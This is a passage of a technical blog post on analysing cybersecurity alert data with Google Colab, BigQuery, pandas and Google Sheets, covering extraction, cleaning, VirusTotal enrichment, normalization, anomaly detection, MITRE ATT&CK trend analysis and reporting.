+|[datetime](https://docs.python.org/3/library/datetime.html) | Essential for handling all operations related to date and time in your data. It allows you to manipulate and format date and time information for analysis. |
+| [google.auth](https://google-auth.readthedocs.io/en/master/) | Manages authentication and access permissions, ensuring secure access to Google Cloud services. It's key for controlling who can access your data and services. |
+| [google.colab.auth](https://cloud.google.com/python/docs/reference/bigquery/latest) | Provides authentication for accessing Google Cloud services within Google Colab notebooks, enabling a secure connection to your cloud-based resources. |
+| [google.cloud.bigquery](https://cloud.google.com/python/docs/reference/bigquery/latest) | A tool for managing large datasets in Google Cloud's BigQuery service. It allows for efficient processing and analysis of massive amounts of data. |
+| [google.cloud.storage](https://cloud.google.com/python/docs/reference/storage/latest) | Used for storing and retrieving data in Google Cloud Storage. It's an ideal solution for handling various data files in the cloud. |
+| [gspread](https://docs.gspread.org/en/latest/) | Facilitates interaction with Google Spreadsheets, allowing for easy manipulation and analysis of spreadsheet data. |
+| [gspread.dataframe](https://pypi.org/project/gspread-dataframe/).set_with_dataframe | Syncs data between Pandas dataframes and Google Spreadsheets, enabling seamless data transfer and updating between these formats. |
+| [matplotlib](https://pypi.org/project/matplotlib/).pyplot.plt | A module in Matplotlib library for creating charts and graphs. It helps in visualizing data in a graphical format, making it easier to understand patterns and trends. |
+| [pandas](https://pandas.pydata.org/) | A fundamental tool for data manipulation and analysis in Python. It offers data structures and operations for manipulating numerical tables and time series. |
+| [pandas.gbq](https://pypi.org/project/pandas-gbq/).to_gbq | Enables the transfer of data from Pandas dataframes directly into Google BigQuery, streamlining the process of moving data into this cloud-based analytics platform. |
+| [pyarrow](https://arrow.apache.org/docs/python/index.html).parquet.pq | Allows for efficient storage and retrieval of data in the Parquet format, a columnar storage file format optimized for use with large datasets. |
+| [seaborn](https://seaborn.pydata.org/) | A Python visualization library based on Matplotlib that provides a high-level interface for drawing attractive and informative statistical graphics. |
+
+Next, we authenticate with BigQuery, and receive authorization to access our datasets as demonstrated earlier. By using Google Workspace credentials, we can easily access BigQuery and other Google Cloud services. The process typically involves a simple code snippet for authentication:
+
+```
+from google.colab import auth
+from google.cloud import bigquery
+
+auth.authenticate_user()
+project_id = "PROJECT_FROM_GCP"
+client = bigquery.Client(project=project_id)
+```
+
+With authentication complete, we can then proceed to access and manipulate our data. Google Colab's integration with Google Cloud services simplifies this process, making it efficient and secure.
+
+## Organizing Colab Notebooks before analysis
+
+When working with Jupyter Notebooks, it's better to organize your notebook beforehand. Various stages of handling and manipulating data will be required, and staying organized will help you create a repeatable, comprehensive process. 
+
+In our notebooks, we use Jupyter Notebook headers to organize the code systematically. This structure allows for clear compartmentalization and the creation of collapsible sections, which is especially beneficial when dealing with complex data operations that require multiple steps. This methodical organization aids in navigating the notebook efficiently, ensuring that each step in the data extraction and analysis process is easily accessible and manageable.
+
+Moreover, while the workflow in a notebook might seem linear, it's often more dynamic. Data analysts frequently engage in multitasking, jumping between different sections as needed based on the data or results they encounter. Furthermore, new insights discovered in one step may influence another step’s process, leading to some back and forth before finishing the notebook.
+ | ![](/assets/images/google-cloud-for-cyber-data-analytics/image3.png)
+ 
+## Extracting Our BigQuery datasets into dataframes
+
+After establishing the structure of our notebook and successfully authenticating with BigQuery, our next step is to retrieve the required datasets. This process sets the foundation for the rest of the report, as the information from these sources will form the basis of our analysis, similar to selecting the key components required for a comprehensive study.
+
+Here's an example of how we might fetch data from BigQuery:
+
+```
+import datetime
+
+current_year = datetime.datetime.now().year
+reb_dataset_id = f'project.global_threat_report.{current_year}_raw_ep_behavior'
+reb_table = client.list_rows(reb_dataset_id)
+reb_df = reb_table.to_dataframe() 
+```
+
+This snippet demonstrates a typical data retrieval process. We first define the dataset we're interested in (with the Global Threat Report, `project.global_threat_report.ep_behavior_raw` for the current year). Then, we use a BigQuery query to select the data from this dataset and load it into a Pandas DataFrame. This DataFrame will serve as the foundation for our subsequent data analysis steps.
+
+![Colab Notebook snippet for data extraction from BigQuery into Pandas dataframe](/assets/images/google-cloud-for-cyber-data-analytics/image4.png)
+Colab Notebook snippet for data extraction from BigQuery into Pandas dataframe
+
+This process marks the completion of the extraction phase. We have successfully navigated BigQuery to select and retrieve the necessary datasets and load them in our notebooks within dataframes. The extraction phase is pivotal, as it not only involves gathering the data but also setting up the foundation for deeper analysis. It's the initial step in a larger journey of discovery, leading to the transformation phase, where we will uncover more detailed insights from the data.
+
+In summary, this part of our data journey is about more than just collecting datasets; it's about structurally preparing them for the in-depth analysis that follows. This meticulous approach to organizing and executing the extraction phase sets the stage for the transformative insights that we aim to derive in the subsequent stages of our data analysis.
+
+# Pre-processing and transformation: The critical phase of data analysis
+
+The transition from raw data to actionable insights involves a series of crucial steps in data processing. After extracting data, our focus shifts to refining it for analysis. Cybersecurity datasets often include various forms of noise, such as false positives and anomalies, which must be addressed to ensure accurate and relevant analysis.
+
+Key stages in data pre-processing and transformation:
+
+ - **Data cleaning:** This stage involves filling NULL values, correcting data misalignments, and validating data types to ensure the dataset's integrity.
+ - **Data enrichment:** In this step, additional context is added to the dataset. For example, incorporating third-party data, like malware reputations from sources such as VirusTotal, enhances the depth of analysis.
+ - **Normalization:** This process standardizes the data to ensure consistency, which is particularly important for varied datasets like endpoint malware alerts.
+ - **Anomaly detection:** Identifying and rectifying outliers or false positives is critical to maintain the accuracy of the dataset.
+ - **Feature extraction:** The process of identifying meaningful, consistent data points that can be further extracted for analysis.
+
+## Embracing the art of data cleaning
+
+Data cleaning is a fundamental step in preparing datasets for comprehensive analysis, especially in cybersecurity. This process involves a series of technical checks to ensure data integrity and reliability. Here are the specific steps:
+
+ - **Mapping to MITRE ATT&CK framework:** Verify that all detection and response rules in the dataset are accurately mapped to the corresponding tactics and techniques in the MITRE ATT&CK framework. This check includes looking for NULL values or any inconsistencies in how the data aligns with the framework.
+
+ - **Data type validation:** Confirm that the data types within the dataset are appropriate and consistent. For example, timestamps should be in a standardized datetime format. This step may involve converting string formats to datetime objects or verifying that numerical values are in the correct format.
+
+ - **Completeness of critical data:** Ensure that no vital information is missing from the dataset. This includes checking for the presence of essential elements like SHA256 hashes or executable names in endpoint behavior logs. The absence of such data can lead to incomplete or biased analysis.
+
+ - **Standardization across data formats:** Assess and implement standardization of data formats across the dataset to ensure uniformity. This might involve normalizing text formats, ensuring consistent capitalization, or standardizing date and time representations.
+
+ - **Duplicate entry identification:** Identify and remove duplicate entries by examining unique identifiers such as XDR agent IDs or cluster IDs. This process might involve using functions to detect and remove duplicates, ensuring the uniqueness of each data entry.
+
+ - **Exclusion of irrelevant internal data:** Locate and remove any internal data that might have inadvertently been included in the dataset. This step is crucial to prevent internal biases or irrelevant information from affecting the analysis.
+
+ It is important to note that data cleaning or “scrubbing the data” is a continuous effort throughout our workflow. As we continue to peel back the layers of our data and wrangle it for various insights, it is expected that we identify additional changes.
+
+## Utilizing Pandas for data cleaning
+
+The [Pandas](https://pandas.pydata.org/about/) library in Python offers several functionalities that are particularly useful for data cleaning in cybersecurity contexts. Some of these methods include:
+
+ - `DataFrame.isnull()` or `DataFrame.notnull()` to identify missing values.
+ - `DataFrame.drop_duplicates()` to remove duplicate rows.
+ - Data type conversion methods like `pd.to_datetime()` for standardizing timestamp formats.
+ - Utilizing boolean indexing to filter out irrelevant data based on specific criteria.
+
+A thorough understanding of the dataset is essential to determine the right cleaning methods. It may be necessary to explore the dataset preliminarily to identify specific areas requiring cleaning or transformation. Additional helpful methods and workflows can be found listed in [this](https://realpython.com/python-data-cleaning-numpy-pandas/) Real Python blog.
+
+## Feature extraction and enrichment
+
+Feature extraction and enrichment are core steps in data analysis, particularly in the context of cybersecurity. These processes involve transforming and augmenting the dataset to enhance its usefulness for analysis. 
+
+ - **Create new data from existing:** This is where we modify or use existing data to add additional columns or rows.
+ - **Add new data from 3rd-party:** Here, we use existing data as a query reference for 3rd-party RESTful APIs which respond with additional data we can add to the datasets.
+
+## Feature extraction
+
+Let’s dig into a tangible example. Imagine we're presented with a bounty of publicly available YARA signatures that Elastic [shares](https://github.com/elastic/protections-artifacts/tree/main/yara/rules) with its community. These signatures trigger some of the endpoint malware alerts in our dataset. A consistent naming convention has been observed based on the rule name that, of course, shows up in the raw data: `OperationsSystem_MalwareCategory_MalwareFamily`. These names can be deconstructed to provide more specific insights. Leveraging Pandas, we can expertly slice and dice the data. For those who prefer doing this during the dataset staging phase with BigQuery, the combination of [SPLIT](https://cloud.google.com/bigquery/docs/reference/standard-sql/string_functions#split) and [OFFSET](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators#offset_and_ordinal) clauses can yield similar results:
+
+```
+df[['OperatingSystem', 'MalwareCategory', 'MalwareFamily']] = df['yara_rule_name'].str.split('_', expand=True)
+```
+
+![Feature extraction with our YARA data](/assets/images/google-cloud-for-cyber-data-analytics/image2.png)
+Feature extraction with our YARA data
+
+There are additional approaches, methods, and processes to feature extraction in data analysis. We recommend consulting your stakeholder's wants/needs and exploring your data to help determine what is necessary for extraction and how.
+
+## Data enrichment
+
+Data enrichment enhances the depth and context of cybersecurity datasets. One effective approach involves integrating external data sources to provide additional perspectives on the existing data. This can be particularly valuable in understanding and interpreting cybersecurity alerts.
+
+**Example of data enrichment: Integrating VirusTotal reputation data**
+A common method of data enrichment in cybersecurity involves incorporating reputation scores from external threat intelligence services like [VirusTotal](https://www.virustotal.com/gui/home/search) (VT). This process typically includes:
+
+ 1. **Fetching reputation data:** Using an API key from VT, we can query for reputational data based on unique identifiers in our dataset, such as SHA256 hashes of binaries.
+
+```
+import requests
+
+def get_reputation(sha256, API_KEY, URL):
+    params = {'apikey': API_KEY, 'resource': sha256}
+    response = requests.get(URL, params=params)
+    json_response = response.json()
+    
+    if json_response.get("response_code") == 1:
+        positives = json_response.get("positives", 0)
+        return classify_positives(positives)
+    else:
+        return "unknown"
+```
+
+In this function, `classify_positives` is a custom function that classifies the reputation based on the number of antivirus engines that flagged the file as malicious.
+
+ 2. **Adding reputation data to the dataset:** The reputation data fetched from VirusTotal is then integrated into the existing dataset. This is done by applying the `get_reputation` function to each relevant entry in the DataFrame.
+
+```
+df['reputation'] = df['sha256'].apply(lambda x: get_reputation(x, API_KEY, URL))
+
+```
+
+Here, a new column named `reputation` is added to the dataframe, providing an additional layer of information about each binary based on its detection rate in VirusTotal.
+
+This method of data enrichment is just one of many options available for enhancing cybersecurity threat data. By utilizing robust helper functions and tapping into external data repositories, analysts can significantly enrich their datasets. This enrichment allows for a more comprehensive understanding of the data, leading to a more informed and nuanced analysis. The techniques demonstrated here are part of a broader range of advanced data manipulation methods that can further refine cybersecurity data analysis.
+
+## Normalization
+
+Especially when dealing with varied datasets in cybersecurity, such as endpoint alerts and cloud SIEM notifications, normalization may be required to get the most out of your data. 
+
+**Understanding normalization:** At its core, normalization is about adjusting values measured on different scales to a common scale, ensuring that they are proportionally represented, and reducing redundancy. In the cybersecurity context, this means representing events or alerts in a manner that doesn't unintentionally amplify or reduce their significance.
+
+Consider our endpoint malware dataset. When analyzing trends, say, infections based on malware families or categories, we aim for an accurate representation. However, a single malware infection on an endpoint could generate multiple alerts depending on the Extended Detection and Response (XDR) system. If left unchecked, this could significantly skew our understanding of the threat landscape. To counteract this, we consider the Elastic agents, which are deployed as part of the XDR solution. Each endpoint has a unique agent, representing a single infection instance if malware is detected. Therefore, to normalize this dataset, we would "flatten" or adjust it based on unique agent IDs. This means, for our analysis, we'd consider the number of unique agent IDs affected by a specific malware family or category rather than the raw number of alerts.
+
+![Example visualization of malware alert normalization by unique agents](/assets/images/google-cloud-for-cyber-data-analytics/image6.png)
+Example visualization of malware alert normalization by unique agents
+
+As depicted in the image above, if we chose to not normalize the malware data in preparation for trend analysis, our key findings would depict inaccurate information. This inaccuracy could be sourced from a plethora of data inconsistencies such as generic YARA rules, programmatic operations that were flagged repeatedly on a single endpoint, and many more.
+
+**Diversifying the approach:** On the other hand, when dealing with endpoint behavior alerts or cloud alerts (from platforms like AWS, GCP, Azure, Google Workspace, and O365), our normalization approach might differ. These datasets could have their own nuances and may not require the same "flattening" technique used for malware alerts.
+
+**Conceptualizing normalization options:** Remember the goal of normalization is to reduce redundancy in your data. Make sure to keep your operations as atomic as possible in case you need to go back and tweak them later. This is especially true when performing both normalization and standardization. Sometimes these can be difficult to separate, and you may have to go back and forth between the two. Analysts have a wealth of options for these. From [Min-Max](https://www.geeksforgeeks.org/data-pre-processing-wit-sklearn-using-standard-and-minmax-scaler/) scaling, where values are shifted and rescaled to range between 0 and 1, to [Z-score](https://www.statology.org/z-score-python/) normalization (or standardization), where values are centered around zero and standard deviations from the mean. The choice of technique depends on the nature of the data and the specific requirements of the analysis. 
+
+In essence, normalization ensures that our cybersecurity analysis is based on a level playing field, giving stakeholders an accurate view of the threat environment without undue distortions. This is a critical step before trend analysis.
+
+## Anomaly detection: Refining the process of data analysis
+
+In the realm of cybersecurity analytics, a one-size-fits-all approach to anomaly detection does not exist. The process is highly dependent on the specific characteristics of the data at hand. The primary goal is to identify and address outliers that could potentially distort the analysis. This requires a dynamic and adaptable methodology, where understanding the nuances of the dataset is crucial.
+
+Anomaly detection in cybersecurity involves exploring various techniques and methodologies, each suited to different types of data irregularities. The strategy is not to rigidly apply a single method but rather to use a deep understanding of the data to select the most appropriate technique for each situation. The emphasis is on flexibility and adaptability, ensuring that the approach chosen provides the clearest and most accurate insights into the data.
+
+### Statistical methods – The backbone of analysis:
+
+Statistical analysis is always an optional approach to anomaly detection, especially for cyber security data. By understanding the inherent distribution and central tendencies of our data, we can highlight values that deviate from the norm. A simple yet powerful method, the Z-score, gauges the distance of a data point from the mean in terms of standard deviations.
+
+```
+import numpy as np
+
+# Derive Z-scores for data points in a feature
+z_scores = np.abs((df['mitre_technique'] - df['mitre_technique'].mean()) / df['mitre_technique'].std())
+
+outliers = df[z_scores > 3]  # Conventionally, a Z-score above 3 signals an outlier
+```
+
+**Why this matters:** This method allows us to quantitatively gauge the significance of a data point's deviation. Such outliers can heavily skew aggregate metrics like mean or even influence machine learning model training detrimentally. Remember, outliers should not always be removed; it is all about context! Sometimes you may even be looking for the outliers specifically.
+
+**Key library:** While we utilize [NumPy](https://numpy.org/) above, [SciPy](https://scipy.org/) can also be employed for intricate statistical operations.
+
+## Aggregations and sorting – unraveling layers:
+
+Data often presents itself in layers. By starting with a high-level view and gradually diving into specifics, we can locate inconsistencies or anomalies. When we aggregate by categories such as the MITRE ATT&CK tactic, and then delve deeper, we gradually uncover the finer details and potential anomalies as we go from technique to rule logic and alert context.
+
+```
+# Aggregating by tactics first
+tactic_agg = df.groupby('mitre_tactic').size().sort_values(ascending=False)
+```
+
+From here, we can identify the most common tactics and choose the tactic with the highest count. We then filter our data for this tactic to identify the most common technique associated with the most common tactic. Techniques often are more specific than tactics and thus add more explanation about what we may be observing. Following the same approach we can then filter for this specific technique, aggregate by rule and review that detection rule for more context. The goal here is to find “noisy” rules that may be skewing our dataset and thus related alerts need to be removed. This cycle can be repeated until outliers are removed and the percentages appear more accurate.
+
+**Why this matters:** This layered analysis approach ensures no stone is left unturned. By navigating from the general to the specific, we systematically weed out inconsistencies.
+
+**Key library:** Pandas remains the hero, equipped to handle data-wrangling chores with finesse.
+
+### Visualization – The lens of clarity:
+
+Sometimes, the human eye, when aided with the right visual representation, can intuitively detect what even the most complex algorithms might miss. A boxplot, for instance, not only shows the central tendency and spread of data but distinctly marks outliers.
+
+```
+import seaborn as sns
+import matplotlib.pyplot as plt
+
+plt.figure(figsize=(12, 8))
+sns.boxplot(x='Malware Family', y='Malware Score', data=df)
+plt.title('Distribution of Malware Scores by Family')
+plt.show()
+```
+
+![Example visualization of malware distribution scores by family from an example dataset](/assets/images/google-cloud-for-cyber-data-analytics/image10.png)
+Example visualization of malware distribution scores by family from an example dataset
+
+**Why this matters:** Visualization transforms abstract data into tangible insights. It offers a perspective that's both holistic and granular, depending on the need.
+
+**Key library:** Seaborn, built atop Matplotlib, excels at turning data into visual stories.
+
+### Machine learning – The advanced guard:
+
+When traditional methods are insufficient, machine learning steps in, offering a predictive lens to anomalies. While many algorithms are designed to classify known patterns, some, like autoencoders in deep learning, learn to recreate 'normal' data, marking any deviation as an anomaly.
+
+**Why this matters:** As data complexity grows, the boundaries of what constitutes an anomaly become blurrier. Machine learning offers adaptive solutions that evolve with the data.
+
+**Key libraries:** [Scikit-learn](https://scikit-learn.org/stable/) is a treasure trove for user-friendly, classical machine learning techniques, while [PyTorch](https://pytorch.org/) brings the power of deep learning to the table.
+
+Perfecting anomaly detection in data analysis is similar to refining a complex skill through practice and iteration. The process often involves trial and error, with each iteration enhancing the analyst's familiarity with the dataset. This progressive understanding is key to ensuring that the final analysis is both robust and insightful. In data analysis, the journey of exploration and refinement is as valuable as the final outcome itself.
+
+Before proceeding to in-depth trend analysis, it's very important to ensure that the data is thoroughly pre-processed and transformed. Just as precision and reliability are essential in any meticulous task, they are equally critical in data analysis. The steps of cleaning, normalizing, enriching, and removing anomalies from the groundwork for deriving meaningful insights. Without these careful preparations, the analysis could range from slightly inaccurate to significantly misleading. It's only when the data is properly refined and free of distortions that it can reveal its true value, leading to reliable and actionable insights in trend analysis.
+
+# Trend analysis: Unveiling patterns in data
+
+In the dynamic field of cybersecurity where threat actors continually evolve their tactics, techniques, and procedures (TTPs), staying ahead of emerging threats is critical. Trend analysis serves as a vital tool in this regard, offering a way to identify and understand patterns and behaviors in cyber threats over time.
+
+By utilizing the MITRE ATT&CK framework, cybersecurity professionals have a structured and standardized approach to analyzing and categorizing these evolving threats. This framework aids in systematically identifying patterns in attack methodologies, enabling defenders to anticipate and respond to changes in adversary behaviors effectively.
+
+Trend analysis, through the lens of the MITRE ATT&CK framework, transforms raw cybersecurity telemetry into actionable intelligence. It allows analysts to track the evolution of attack strategies and to adapt their defense mechanisms accordingly, ensuring a proactive stance in cybersecurity management.
+
+## Beginning with a broad overview: Aggregation and sorting
+
+Commencing our analysis with a bird's eye view is paramount. This panoramic perspective allows us to first pinpoint the broader tactics in play before delving into the more granular techniques and underlying detection rules.
+
+**Top tactics:** By aggregating our data based on MITRE ATT&CK tactics, we can discern the overarching strategies adversaries lean toward. This paints a picture of their primary objectives, be it initial access, execution, or exfiltration.
+
+```
+top_tactics = df.groupby('mitre_tactic').size()
+ .sort_values(ascending=False)
+```
+
+**Zooming into techniques:** Once we've identified a prominent tactic, we can then funnel our attention to the techniques linked to that tactic. This reveals the specific modus operandi of adversaries.
+
+```
+chosen_tactic = 'Execution'
+
+techniques_under_tactic = df[df['mitre_tactic'] == chosen_tactic]
+top_techniques = techniques_under_tactic.groupby('mitre_technique').size()
+ .sort_values(ascending=False)
+```
+
+**Detection rules and logic:** With our spotlight on a specific technique, it's time to delve deeper, identifying the detection rules that triggered alerts. This not only showcases what was detected, but by reviewing the detection logic, we also gain an understanding of the precise behaviors and patterns that were flagged.
+
+```
+chosen_technique = 'Scripting'
+
+rules_for_technique = techniques_under_tactic[techniques_under_tactic['mitre_technique'] == chosen_technique]
+
+top_rules = rules_for_technique
+ .groupby('detection_rule').size().sort_values(ascending=False)
+```
+
+This hierarchical, cascading approach is akin to peeling an onion. With each layer, we expose more intricate details, refining our perspective and sharpening our insights.
+
+## The power of time: Time series analysis
+
+In the realm of cybersecurity, time isn't just a metric; it's a narrative. Timestamps, often overlooked, are goldmines of insights. Time series analysis allows us to plot events over time, revealing patterns, spikes, or lulls that might be indicative of adversary campaigns, specific attack waves, or dormancy periods.
+
+For instance, plotting endpoint malware alerts over time can unveil an adversary's operational hours or spotlight a synchronized, multi-vector attack:
+
+```
+import matplotlib.pyplot as plt
+
+# Extract and plot endpoint alerts over time
+df.set_index('timestamp')['endpoint_alert'].resample('D').count().plot()
+plt.title('Endpoint Malware Alerts Over Time')
+plt.xlabel('Time')
+plt.ylabel('Alert Count')
+plt.show()
+```
+
+Time series analysis doesn't just highlight "when" but often provides insights into the "why" behind certain spikes or anomalies. It aids in correlating external events (like the release of a new exploit) to internal data trends.
+
+## Correlation analysis
+
+Understanding relationships between different sets of data can offer valuable insights. For instance, a spike in one type of alert could correlate with another type of activity in the system, shedding light on multi-stage attack campaigns or diversion strategies.
+
+```
+# Finding correlation between an increase in login attempts and data exfiltration activities
+correlation_value = df['login_attempts'].corr(df['data_exfil_activity'])
+```
+
+This analysis, with the help of pandas [corr](https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.corr.html), can help in discerning whether multiple seemingly isolated activities are part of a coordinated attack chain.
+
+Correlation also does not have to be metric-driven either. When analyzing threats, it is easy to find value and new insights by comparing older findings to the new ones.
+
+## Machine learning & anomaly detection
+
+With the vast volume of data, manual analysis becomes impractical. Machine learning can assist in identifying patterns and anomalies that might escape the human eye. Algorithms like [Isolation Forest](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.IsolationForest.html) or [K-nearest neighbor](https://scikit-learn.org/stable/modules/neighbors.html)(KNN) are commonly used to spot deviations or clusters of commonly related data.
+
+```
+from sklearn.ensemble import IsolationForest
+
+# Assuming 'feature_set' contains relevant metrics for analysis
+clf = IsolationForest(contamination=0.05)
+anomalies = clf.fit_predict(feature_set)
+```
+
+Here, the anomalies variable will flag data points that deviate from the norm, helping analysts pinpoint unusual behavior swiftly.
+
+## Behavioral patterns & endpoint data analysis
+
+Analyzing endpoint behavioral data collected from detection rules allows us to unearth overarching patterns and trends that can be indicative of broader threat landscapes, cyber campaigns, or evolving attacker TTPs.
+
+**Tactic progression patterns:** By monitoring the sequence of detected behaviors over time, we can spot patterns in how adversaries move through their attack chain. For instance, if there's a consistent trend where initial access techniques are followed by execution and then lateral movement, it's indicative of a common attacker playbook being employed.
+
+**Command-line trend analysis:** Even within malicious command-line arguments, certain patterns or sequences can emerge. Monitoring the most frequently detected malicious arguments can give insights into favored attack tools or scripts.
+
+Example:
+
+```
+# Most frequently detected malicious command lines
+top_malicious_commands = df.groupby('malicious_command_line').size()
+ .sort_values(ascending=False).head(10)
+```
+
+**Process interaction trends:** While individual parent-child process relationships can be malicious, spotting trends in these interactions can hint at widespread malware campaigns or attacker TTPs. For instance, if a large subset of endpoints is showing the same unusual process interaction, it might suggest a common threat.
+
+**Temporal behavior patterns:** Just as with other types of data, the temporal aspect of endpoint behavioral data can be enlightening. Analyzing the frequency and timing of certain malicious behaviors can hint at attacker operational hours or campaign durations.
+
+Example:
+
+```
+# Analyzing frequency of a specific malicious behavior over time
+monthly_data = df.pivot_table(index='timestamp', columns='tactic', values='count', aggfunc='sum').resample('M').sum()
+
+ax = monthly_data[['execution', 'defense-evasion']].plot(kind='bar', stacked=False, figsize=(12,6))
+
+plt.title("Frequency of 'execution' and 'defense-evasion' Tactics Over Time")
+
+plt.ylabel("Count")
+ax.set_xticklabels([x.strftime('%B-%Y') for x in monthly_data.index])
+plt.xticks(rotation=45)
+plt.tight_layout()
+plt.show()
+```
+
+![Note: This image is from example data and not from the Global Threat Report](/assets/images/google-cloud-for-cyber-data-analytics/image11.png)
+Note: This image is from example data and not from the Global Threat Report
+
+By aggregating and analyzing endpoint behavioral data at a macro level, we don't just identify isolated threats but can spot waves, trends, and emerging patterns. This broader perspective empowers cybersecurity teams to anticipate, prepare for, and counter large-scale cyber threats more effectively.
+
+While these are some examples of how to perform trend analysis, there is no right or wrong approach. Every analyst has their own preference or set of questions they or stakeholders may want to ask. Here are some additional questions or queries analysts may have for cybersecurity data when doing trend analysis.
+
+ - What are the top three tactics being leveraged by adversaries this quarter?
+ - Which detection rules are triggering the most, and is there a common thread?
+ - Are there any time-based patterns in endpoint alerts, possibly hinting at an adversary's timezone?
+ - How have cloud alerts evolved with the migration of more services to the cloud?
+ - Which malware families are becoming more prevalent, and what might be the cause?
+ - Do the data patterns suggest any seasonality, like increased activities towards year-end?
+ - Are there correlations between external events and spikes in cyber activities?
+ - How does the weekday data differ from weekends in terms of alerts and attacks?
+ - Which organizational assets are most targeted, and are their defenses up-to-date?
+ - Are there any signs of internal threats or unusual behaviors among privileged accounts?
+
+Trend analysis in cybersecurity is a dynamic process. While we've laid down some foundational techniques and questions, there are myriad ways to approach this vast domain. Each analyst may have their preferences, tools, and methodologies, and that's perfectly fine. The essence lies in continuously evolving and adapting to our approach while cognizantly being aware of the ever-changing threat landscape for each ecosystem exposed to threats.
+
+# Reduction: Streamlining for clarity
+
+Having progressed through the initial stages of our data analysis, we now enter the next phase: reduction. This step is about refining and concentrating our comprehensive data into a more digestible and focused format.
+
+Recap of the Analysis Journey So Far:
+
+ - **Extraction:** The initial phase involved setting up our Google Cloud environment and selecting relevant datasets for our analysis.
+ - **Pre-processing and transformation:** At this stage, the data was extracted, processed, and transformed within our Colab notebooks, preparing it for detailed analysis.
+ - **Trend analysis:** This phase provided in-depth insights into cyber attack tactics, techniques, and malware, forming the core of our analysis.
+
+While the detailed data in our Colab Notebooks is extensive and informative for an analyst, it might be too complex for a broader audience. Therefore, the reduction phase focuses on distilling this information into a more concise and accessible form. The aim is to make the findings clear and understandable, ensuring that they can be effectively communicated and utilized across various departments or stakeholders.
+
+## Selecting and aggregating key data points
+
+In order to effectively communicate our findings, we must tailor the presentation to the audience's needs. Not every stakeholder requires the full depth of collected data; many prefer a summarized version that highlights the most actionable points. This is where data selection and aggregation come into play, focusing on the most vital elements and presenting them in an accessible format.
+
+Here's an example of how to use Pandas to aggregate and condense a dataset, focusing on key aspects of endpoint behavior:
+
+```
+required_endpoint_behavior_cols = ['rule_name','host_os_type','tactic_name','technique_name']
+
+
+reduced_behavior_df = df.groupby(required_endpoint_behavior_cols).size()
+ .reset_index(name='count')
+ .sort_values(by="count", ascending=False)
+ .reset_index(drop=True)
+
+columns = {
+    'rule_name': 'Rule Name', 
+    'host_os_type': 'Host OS Type',
+    'tactic_name': 'Tactic', 
+    'technique_name': 'Technique', 
+    'count': 'Alerts'
+}
+
+reduced_behavior_df = reduced_behavior_df.rename(columns=columns)
+```
+
+One remarkable aspect of this code and process is the flexibility it offers. For instance, we can group our data by various data points tailored to our needs. Interested in identifying popular tactics used by adversaries? Group by the MITRE ATT&CK tactic. Want to shed light on masquerading malicious binaries? Revisit extraction to add more Elastic Common Schema (ECS) fields such as file path, filter on Defense Evasion, and aggregate to reveal the commonly trodden paths. This approach ensures we create datasets that are both enlightening and not overwhelmingly rich, tailor-made for stakeholders who wish to understand the origins of our analysis.
+
+This process involves grouping the data by relevant categories such as rule name, host OS type, and MITRE ATT&CK tactics and techniques and then counting the occurrences. This method helps in identifying the most prevalent patterns and trends in the data.
+
+![Diagram example of data aggregation to obtain reduced dataset](/assets/images/google-cloud-for-cyber-data-analytics/image5.png)
+Diagram example of data aggregation to obtain reduced dataset
+
+## Exporting reduced data to Google Sheets for accessibility
+
+The reduced data, now stored as a dataframe in memory, is ready to be exported. We use Google Sheets as the platform for sharing these insights because of its wide accessibility and user-friendly interface. The process of exporting data to Google Sheets is straightforward and efficient, thanks to the integration with Google Cloud services.
+
+Here's an example of how the data can be uploaded to Google Sheets using Python from our Colab notebook:
+
+```
+auth.authenticate_user()
+credentials, project = google.auth.default()
+gc = gspread.authorize(credentials)
+workbook = gc.open_by_key("SHEET_ID")
+behavior_sheet_name = 'NAME_OF_TARGET_SHEET'
+endpoint_behavior_worksheet = workbook.worksheet(behavior_sheet_name)
+set_with_dataframe(endpoint_behavior_worksheet, reduced_behavior_df)
+```
+
+With a few simple lines of code, we have effectively transferred our data analysis results to Google Sheets. This approach is widely used due to its accessibility and ease of use. However, there are multiple other methods to present data, each suited to different requirements and audiences. For instance, some might opt for a platform like [Looker](https://cloud.google.com/looker?hl=en) to present the processed data in a more dynamic dashboard format. This method is particularly useful for creating interactive and visually engaging presentations of data. It ensures that even stakeholders who may not be familiar with the technical aspects of data analysis, such as those working in Jupyter Notebooks, can easily understand and derive value from the insights.
+
+![Results in Google Sheet](/assets/images/google-cloud-for-cyber-data-analytics/image7.png)
+
+This streamlined process of data reduction and presentation can be applied to different types of datasets, such as cloud SIEM alerts, endpoint behavior alerts, or malware alerts. The objective remains the same: to simplify and concentrate the data for clear and actionable insights.
+
+# Presentation: Showcasing the insights
+
+After meticulously refining our datasets, we now focus on the final stage: the presentation. Here we take our datasets, now neatly organized in platforms like Google Sheets or Looker, and transform them into a format that is both informative and engaging.
+
+## Pivot tables for in-depth analysis
+
+Using pivot tables, we can create a comprehensive overview of our trend analysis findings. These tables allow us to display data in a multi-dimensional manner, offering insights into various aspects of cybersecurity, such as prevalent MITRE ATT&CK tactics, chosen techniques, and preferred malware families.
+
+Our approach to data visualization involves:
+
+ - **Broad overview with MITRE ATT&CK tactics:** Starting with a general perspective, we use pivot tables to overview the different tactics employed in cyber threats.
+ - **Detailed breakdown:** From this panoramic view, we delve deeper, creating separate pivot tables for each popular tactic and then branching out into detailed analyses for each technique and specific detection rule.
+
+This methodical process helps to uncover the intricacies of detection logic and alerts, effectively narrating the story of the cyber threat landscape.
+
+![Diagram showcasing aggregations funnel into contextual report information](/assets/images/google-cloud-for-cyber-data-analytics/image1.png)
+Diagram showcasing aggregations funnel into contextual report information
+
+**Accessibility across audiences:** Our data presentations are designed to cater to a wide range of audiences, from those deeply versed in data science to those who prefer a more straightforward understanding. The Google Workspace ecosystem facilitates the sharing of these insights, allowing pivot tables, reduced datasets, and other elements to be easily accessible to all involved in the report-making process.
+
+**Integrating visualizations into reports:** When crafting a report, for example, in Google Docs, the integration of charts and tables from Google Sheets is seamless. This integration ensures that any modifications in the datasets or pivot tables are easily updated in the report, maintaining the efficiency and coherence of the presentation.
+
+**Tailoring the presentation to the audience:** The presentation of data insights is not just about conveying information; it's about doing so in a visually appealing and digestible manner. For a more tech-savvy audience, an interactive Colab Notebook with dynamic charts and functions may be ideal. In contrast, for marketing or design teams, a well-designed dashboard in Looker might be more appropriate. The key is to ensure that the presentation is clear, concise, and visually attractive, tailored to the specific preferences and needs of the audience.
+
